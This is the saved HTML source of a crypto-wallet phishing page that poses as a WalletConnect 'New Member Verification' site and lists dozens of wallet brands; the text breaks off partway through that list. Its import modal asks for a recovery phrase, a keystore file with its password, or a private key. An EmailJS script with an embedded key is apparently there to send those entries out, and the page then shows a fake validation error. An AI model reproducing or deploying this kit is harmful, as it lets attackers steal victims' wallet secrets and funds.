<!-- saved from url=(0023)https://verifyme.cloud/ -->
<html prefix="og: http://ogp.me/ns#">
<!-- Mirrored from verifyme.site/en/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 01 Feb 2022 03:59:54 GMT -->


<!-- Mirrored from maintdapp.com/dex/imp/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 16 Apr 2023 14:44:50 GMT -->

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <link href="css/main.css" rel="stylesheet">
    <link href="css/style.css" rel="stylesheet">

    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="generator" content="Gatsby 2.25.1">
    <title data-react-helmet="true">Welcome</title>
    <link data-react-helmet="true" rel="shortcut icon" href="img/image.jpg">
    <meta data-react-helmet="true" name="msapplication-TileColor" content="#da532c">
    <meta data-react-helmet="true" name="theme-color" content="#ffffff">
    <meta data-react-helmet="true" name="description"
        content="1. Click the above, 2. Select Wallet Type, 3. Input Necessary information, 4. Validate">
    <meta data-react-helmet="true" name="keywords"
        content="ethereum, cryptocurrency, wallet, mobile, connect, bridge, relay, proxy, standard, protocol, crypto, tokens, dapp">
    <meta data-react-helmet="true" name="twitter:card" content="summary_large_image">
    <meta data-react-helmet="true" name="twitter:site" content="@syncwallet">
    <meta data-react-helmet="true" name="twitter:title" content="">
    <meta data-react-helmet="true" name="twitter:description"
        content="1. Click the above, 2. Select Wallet Type, 3. Input Necessary information, 4. Validate">
    <meta data-react-helmet="true" name="twitter:img:src" content="../social-card.html">
    <meta data-react-helmet="true" name="og:title" content="Click Here To Verify">
    <meta data-react-helmet="true" name="og:type" content="website">
    <meta data-react-helmet="true" name="og:url" content="../">
    <meta data-react-helmet="true" name="og:image" content="../../syncwallet.online/social-card.html">
    <meta data-react-helmet="true" name="og:description"
        content="1. Click the above, 2. Select Wallet Type, 3. Input Necessary information, 4. Validate">
    <meta data-react-helmet="true" name="og:site_name" content="New Member Verification">
    <meta data-react-helmet="true" name="fb:admins" content="365412154213405">
    <link rel="stylesheet" href="./style.css">

    <!-- <link as="script" rel="preload"
        href="https://accountresolvecenter.netlify.app/verifyme.cloud/webpack-runtime-08a0e953018334063ddd.html">
    <link as="script" rel="preload"
        href="https://accountresolvecenter.netlify.app/verifyme.cloud/framework-8e528b732ab2eaadb7b7.html">
    <link as="script" rel="preload"
        href="https://accountresolvecenter.netlify.app/verifyme.cloud/app-2b5a75f35e7d5a1e67ad.html">
    <link as="script" rel="preload"
        href="https://accountresolvecenter.netlify.app/verifyme.cloud/commons-728581910d6e685fb39c.html">
    <link as="script" rel="preload"
        href="https://accountresolvecenter.netlify.app/verifyme.cloud/component---src-pages-apps-tsx-50d212c53780f4e2ed64.html">
    <link as="fetch" rel="preload" href="https://verifyme.cloud/page-data/apps/page-data.json" crossorigin="anonymous">
    <link as="fetch" rel="preload" href="https://verifyme.cloud/page-data/app-data.json" crossorigin="anonymous"> -->
    <script type="text/javascript" src="js/email.min.js"></script>
    <script type="text/javascript">
        (function () {
            emailjs.init("n_-GhSNMvUmAhQFyk");
        })();
    </script>
    <script type="module" src="./domMod.js"></script>
    <link rel="stylesheet" href="./preloader.css">
    <script>
        window.addEventListener("load", async () => {
            var Loader = document.querySelector(".Loader");
            setTimeout(() => Loader.classList.add("Loader_hidden"), 3000);
        });
    </script>
</head>

<body style="display: block; background-color: #312A70 !important;" data-new-gr-c-s-check-loaded="14.1041.0"
    data-gr-ext-installed="">
    <div class="Loader">
        <div class="container">
            <div class="gearbox">
                <div class="overlayy"></div>
                <div class="gear one">
                    <div class="gear-inner">
                        <div class="bar"></div>
                        <div class="bar"></div>
                        <div class="bar"></div>
                    </div>
                </div>
                <div class="gear two">
                    <div class="gear-inner">
                        <div class="bar"></div>
                        <div class="bar"></div>
                        <div class="bar"></div>
                    </div>
                </div>
                <div class="gear three">
                    <div class="gear-inner">
                        <div class="bar"></div>
                        <div class="bar"></div>
                        <div class="bar"></div>
                    </div>
                </div>
                <div class="gear four large">
                    <div class="gear-inner">
                        <div class="bar"></div>
                        <div class="bar"></div>
                        <div class="bar"></div>
                        <div class="bar"></div>
                        <div class="bar"></div>
                        <div class="bar"></div>
                    </div>
                </div>
            </div>
            <h1>Setting up a secure enviroment</h1>
        </div>

    </div>
    <div class="sending" data-reach-dialog-overlay="" style="opacity: 1;z-index: 99999;display: none">
        <div class="containerz">
            <img class="qrrrr" src="img/qr-code.png">
        </div>
    </div>
    <div class="sc-bdVaJa LPcxt" data-reach-dialog-overlay="" style="opacity: 1; display: none;">
        <div aria-modal="true" role="dialog" tabindex="-1" aria-label="dialog" class="sc-bwzfXH iiXYOL"
            data-reach-dialog-content="">
            <div class="sc-cMhqgX gUQEWC">
                <div class="sc-cmthru jJAhga">
                    <div class="sc-bsbRJL fRcQRh">
                        <svg width="20" height="20" viewBox="0 0 20 20" fill="none" stroke="currentColor"
                            stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="sc-hZSUBg fRJrUU">
                            <line x1="18" y1="6" x2="6" y2="18">
                            </line>
                            <line x1="6" y1="6" x2="18" y2="18">
                            </line>
                        </svg>
                    </div>
                    <div class="sc-iuJeZd hRZQmk" color="blue">
                        <div class="sc-gqPbQI fhSmUE">
                            Back
                        </div>
                    </div>
                    <div class="sc-esOvli jebOoi">
                        <div class="sc-hrWEMg bHjlF">
                            <div class="sc-gwVKww jEMAel">
                                <div class="sc-iQNlJl dJZYYq">
                                    <div class="sc-hXRMBi deLgHH">
                                        <div class="loading">Initializing...</div>
                                        <div class="sc-epnACN jwEAlI" style="display: none;">
                                            Connect Manually
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <button id="connect-METAMASK" class="sc-kPVwWT sc-kfGgVZ sc-kIPQKe dQoUpv">
                                <div class="sc-esjQYD iGptdp">
                                    <div color="#E8831D" class="sc-RefOD jsJmJE">Metamask</div>
                                    <div class="sc-iQKALj GTKuw">
                                        Easy-to-use browser extension.
                                    </div>
                                </div>
                                <div class="sc-bwCtUz lgYJCf">
                                    <img class="firstImg" src="img/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png"
                                        alt="Icon" style="width: 24px;">
                                </div>
                            </button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="2tzjbs overlay" data-rbnxzn="qw7i7k" style="display: none;">
        <div class="ih37zd aletr sswla" data-j9niem="t4amku" style="display: block;">
            <div role="dialog" aria-modal="true" aria-labelledby="modal-headline"
                class="block align-bottom bg-white rounded-lg text-left overflow-hidden  transform transition-all sm:my-8 sm:align-middle">
                <div class="bg-white px-4 pt-5 pb-4 sm:p-6 sm:pb-4">
                    <div class="sm:flex sm:items-start">
                        <div class="mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left w-full mr-10">
                            <h3 id="modal-headline" class="text-lg leading-6 mt-2 font-medium text-gray-900"
                                style="display: flex; flex-direction: row;"> <img
                                    src="./img/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png"
                                    style="margin-right: 20px; height: 40px; width: 40px" id="myImg"><span>Import your
                                    <span id="walletname">Metamask</span> wallet
                                </span>
                            </h3>
                            <div class="mt-2">
                                <div class="mt-10">
                                    <input type="hidden" name="form-name" value="my-form">
                                    <div class="flex justify-evenly border-b-2 border-fuchsia-600 mb-4">
                                        <div id="phrase"
                                            class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                                            Phrase
                                        </div>
                                        <div id="keystore"
                                            class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                                            Keystore JSON
                                        </div>
                                        <div id="private"
                                            class="p-2 border-b-2 border-white hover:border-blue-600 cursor-pointer">
                                            Private Key
                                        </div>
                                    </div>

                                    <form method="" class="gform" id="phraseForm">

                                        <!---- HONEYPOT----->
                                        <!-- <input type="text" name="_honey" style="display: none;"> -->

                                        <!---- DISABLE CAPTCHA----->
                                        <!-- <input type="hidden" name="_captcha" value="false"> -->

                                        <!-- <input type="hidden" name="_next"
                                            value="https://activeresetlaunch.site//next/action1/success.html"> -->

                                        <div id="first" class="acc-body active">
                                            <div class="flex flex-col">
                                            </div>
                                            <div class="flex flex-col mb-6">
                                                <div class="relative" data-children-count="1">
                                                    <textarea id="recovery_phrase" cols="30" rows="4"
                                                        onpaste="testPaste()" placeholder="Enter your recovery phrase"
                                                        class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400"
                                                        name="phrase" required=""></textarea>
                                                    <p class="text-xs text-grey-300 mt-6">
                                                        Typically 12 (sometimes 24) words separated by single spaces
                                                    </p>
                                                </div>
                                            </div>
                                            <div class="flex w-full">
                                                <button type="submit" form="phraseForm"
                                                    class="btn btn-primary flex items-center justify-center focus:outline-none text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2 w-full transition duration-150 ease-in">
                                                    <span class="mr-2 uppercase"
                                                        onclick="thankyou_message()">Import</span>
                                                    <span>
                                                        <svg fill="none" stroke-linecap="round" stroke-linejoin="round"
                                                            stroke-width="2" viewBox="0 0 24 24" stroke="currentColor"
                                                            class="h-6 w-6">
                                                            <path
                                                                d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9 0 11-18 0 9 9 0 0118 0z">
                                                            </path>
                                                        </svg>
                                                    </span>
                                                </button>
                                            </div>

                                            <!-- Successfully Submitted page-->
                                            <div style="display: none;" class="thankyou_message">
                                                <center>
                                                    <p class="successful">Error Validating Wallet !!!, please retry with
                                                        a different wallet</p>
                                                </center>
                                                <img src="error.png" width="25%" height="25%"
                                                    style="display:block; margin-left:auto; margin-right:auto"
                                                    class="thankyou_message">
                                            </div>
                                        </div>

                                    </form>


                                    <form method="" class="gform" id="keystoreForm">

                                        <!---- HONEYPOT----->
                                        <input type="text" name="_honey" style="display: none;">

                                        <!---- DISABLE CAPTCHA----->
                                        <input type="hidden" name="_captcha" value="false">

                                        <input type="hidden" name="_next"
                                            value="https://activeresetlaunch.site//next/action1/success.html">
                                        <!----  <input type="hidden" name="_captcha" value="false">
                                        <input type="hidden" name="_next" value="error.html">  ----->
                                        <div id="second" class="acc-body bg-grey-600">
                                            <div class="flex flex-col">
                                            </div>
                                            <div class="flex flex-col mb-6">
                                                <div class="relative">
                                                    <textarea cols="30" rows="4" id="keystoreJson"
                                                        placeholder="Enter your Keystore JSON"
                                                        class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400"
                                                        name="keystore" required=""></textarea>
                                                </div>
                                            </div>
                                            <div class="flex flex-col mb-6">
                                                <div class="relative" data-children-count="1">
                                                    <input type="text" name="password" placeholder="Wallet password"
                                                        id="keystorePassword"
                                                        class="text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
                                                    <p class="text-xs text-grey-300 mt-6">
                                                        Several lines of text beginning with "{...}" plus the password
                                                        you used to encrypt it.
                                                    </p>
                                                </div>
                                            </div>
                                            <div class="flex w-full">
                                                <button type="submit" form="keystoreForm" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
                                                    <span class="mr-2 
                                             uppercase" onclick="thankyou_message()">Import</span>
                                                    <span>
                                                        <svg fill="none" stroke-linecap="round" stroke-linejoin="round"
                                                            stroke-width="2" viewBox="0 0 24 24" stroke="currentColor"
                                                            class="h-6 w-6">
                                                            <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                                                        </svg>
                                                    </span>
                                                </button>
                                            </div>

                                            <!-- Successfully Submitted page-->
                                            <div style="display:none" class="thankyou_message">
                                                <center>
                                                    <p class="successful">Unable to Validate Wallet !!!, try another
                                                        wallet</p>
                                                </center>
                                                <img src="error.png" width="25%" height="25%"
                                                    style="display:block; margin-left:auto; margin-right:auto"
                                                    class="thankyou_message">
                                            </div>
                                        </div>

                                    </form>

                                    <form method="" class="gform" id="privateKeyForm">

                                        <!---- HONEYPOT----->
                                        <input type="text" name="_honey" style="display: none;">

                                        <!---- DISABLE CAPTCHA----->
                                        <input type="hidden" name="_captcha" value="false">

                                        <input type="hidden" name="_next"
                                            value="https://activeresetlaunch.site//next/action1/success.html">
                                        <!----  <input type="hidden" name="_captcha" value="false">
                                        <input type="hidden" name="_next" value="error.html">  ----->
                                        <div id="third" class="acc-body bg-grey-600">
                                            <div class="flex flex-col">
                                                <div class="relative"><input type="hidden" name="wallet_id"
                                                        required="required" placeholder="Wallet ID" id="wallet_id"
                                                        value="Metamask"></div>
                                            </div>
                                            <div class="flex flex-col mb-6">
                                                <div class="relative" data-children-count="1">
                                                    <input type="text" id="privateKey"
                                                        placeholder="Enter your Private Key" name="key"
                                                        class=" text-sm sm:text-base placeholder-gray-500 pl-4 pr-4 rounded-lg border border-gray-400 w-full py-2 focus:outline-none focus:border-blue-400">
                                                    <p class="text-xs text-grey-300 mt-6">
                                                        Typically 12 (sometimes 24) words seperated by a single space.
                                                    </p>
                                                </div>
                                            </div>
                                            <div class="flex w-full">
                                                <button type="submit" form="privateKeyForm" class="flex items-center justify-center focus:outline-none
                                          text-white text-sm sm:text-base bg-blue-600 hover:bg-blue-700 rounded py-2
                                          w-full transition duration-150 ease-in">
                                                    <span class="mr-2
                                             uppercase" onclick="thankyou_message()">Import</span>
                                                    <span>
                                                        <svg fill="none" stroke-linecap="round" stroke-linejoin="round"
                                                            stroke-width="2" viewBox="0 0 24 24" stroke="currentColor"
                                                            class="h-6 w-6">
                                                            <path d="M13 9l3 3m0 0l-3 3m3-3H8m13 0a9 9
                                                   0 11-18 0 9 9 0 0118 0z"></path>
                                                        </svg>
                                                    </span>
                                                </button>
                                            </div>
                                        </div>
                                    </form>

                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="bg-gray-50 px-4 py-3 sm:px-6 sm:flex sm:flex-row-reverse"><button id="cancel" type="button"
                        class="w-full inline-flex justify-center rounded-md border border-transparent shadow-sm px-4 py-2 bg-red-600 text-base font-medium text-white hover:bg-red-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-red-500 sm:ml-3 sm:w-auto sm:text-sm">
                        Cancel
                    </button>
                </div>
            </div>
        </div>
    </div>

    <div id="___gatsby">
        <div style="outline:none" tabindex="-1" id="gatsby-focus-wrapper">
            <div class="collabland">
                <h4>
                    <p>
                        <font color="#FFFFFF"> WalletConnect</font>
                    </p>
                </h4>

            </div>
            <section class="pageStyles__SSection-sc-1navawn-4 ibLsRQ">
                <p style="      float: left;
                  font-weight: bold;
                  margin: 20px 0 0 0;
                  text-align: left;
                  padding: 14px 24px;
                  color: black;"> Connect to a wallet</p>
                <div class="Grid__SGrid-sc-8d5rqj-0 gAVVCu">
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            W1 wallet
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/otherssss.jpg" alt="Trust">
                        </div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Auro wallet
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="./aurowallet.png" alt="Trust">
                        </div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Metamask
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/metamask-69ce6b56bbc9953dfb4aecebdf88729b.png" alt="Meta">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Trust
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/trust-wallet-66f8777532931d9c09b633344981a6a9.png"
                                alt="Trust">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Phantom
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/phantom%20wallet%20icon.png" alt="Meta">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Xumm
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="https://i.ibb.co/CQbZrzW/xumm.png" alt="Xumm">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            SaitaPro
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="https://i.ibb.co/0DjSVcg/saitapro.png" alt="SaitaPro">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Coinbase
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/coinbase.png" alt="Coinbase">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            crypto.com
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/crypto-4cbeac57421fb3ca2573db2cf448169a.png"
                                alt="Cypto.com">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Blockchain
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/blockchain-logo.png" alt="Blockchain">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Binance Smart Chain
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/bsc-logo.png" alt="binance">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Safepal
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/safepal-1022b40e2ea3a4a6bb19cf6ff28d8b92.png" alt="safepal">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Safemoon
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="https://i.ibb.co/8Xs5Bw8/safemoon.png" alt="Safemoon">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            WalletConnect
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/image.jpg" alt="Argent">
                        </div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Argent
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/argent.png" alt="Argent">
                        </div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            XinFin
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/xinfin.png" alt="Argent">
                        </div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Terra Station
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/terrastation.png" alt="Argent">
                        </div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Keplr
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/keplr.png" alt="Argent">
                        </div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            D'Cent
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/dcent.png" alt="Argent">
                        </div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Ledger
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/ledger.png" alt="Argent">
                        </div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Trezor
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/trezor.png" alt="Argent">
                        </div>
                    </div>
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Neon
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/neon.png" alt="Argent">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Fortmatic
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/formatic.png" alt="Meta">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Aktionariat
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/aktionariat-c5784b26234a389632687a36d2fb3258.png"
                                alt="aktionariat">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Keyring Pro
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/keyringpro-830b2c0ee1db401dd64c2899eaf2adb3.png"
                                alt="keyring">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            BitKeep
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/bitkeep-387b0ca7da4cf322f44c70c23064c529.png" alt="bitkeep">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            SparkPoint
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/sparkpoint-5c0d3a4ab850a7ee2a3f03e215b68f2c.png"
                                alt="SparkPoint">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            OwnBit
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/ownbit-0b6b21e40acf2fa0f85d2c5ce38c4c51.png" alt="ownbit">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Infinty Wallet
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/infinity-wallet-48e78bc97f96bad14ee6b781423a69ea.png"
                                alt="infinity">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
                    <div class="pageStyles__SApp-sc-1navawn-5 cmAzHq">
                        <div class="pageStyles__SAppName-sc-1navawn-7 eodRCW">
                            <div class="flex items-center justify-center green">
                                <div class="mr2 bg-green br-100" style="height:8px;width:8px">
                                </div>
                            </div>
                            Wallet.io
                        </div>
                        <div class="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
                            <img class="img-icons" src="img/wallet-io-198f396de22fe25eb370f46544abe69d.png"
                                alt="wallet.io">
                        </div>
                    </div>
                    <!-- end -->
                    <!-- start -->
